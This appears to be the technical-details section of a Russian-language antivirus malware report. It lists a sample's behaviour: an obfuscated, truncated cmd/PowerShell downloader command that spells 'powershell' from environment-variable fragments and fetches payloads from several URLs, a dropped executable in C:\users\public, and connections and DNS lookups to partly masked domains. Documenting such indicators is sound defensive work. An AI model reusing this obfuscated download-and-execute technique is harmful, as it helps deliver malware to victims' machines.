Техническая информация
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $etailers14='azure77';$Security67=new-object Net.WebClient;$Borders29='http://de###abiye.com/LrBN7ad@http://staff.pelfberry.com/bNRouz3@ht...
- C:\users\public\851.exe
- C:\users\public\851.exe
- 'ma####k.ridvxn.site':80
- 'df####b1.onamae.com':80
- DNS ASK de###abiye.com
- DNS ASK st###.pelfberry.com
- DNS ASK ma####k.ridvxn.site
- DNS ASK df####b1.onamae.com
- DNS ASK le#######imi.theophraste.net
- DNS ASK aw###n-hda.com
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $etailers14='azure77';$Security67=new-object Net.WebClient;$Borders29='http://de###abiye.com/LrBN7ad@http://staff.pelfberry.com/bNRouz3@ht...' (со скрытым окном)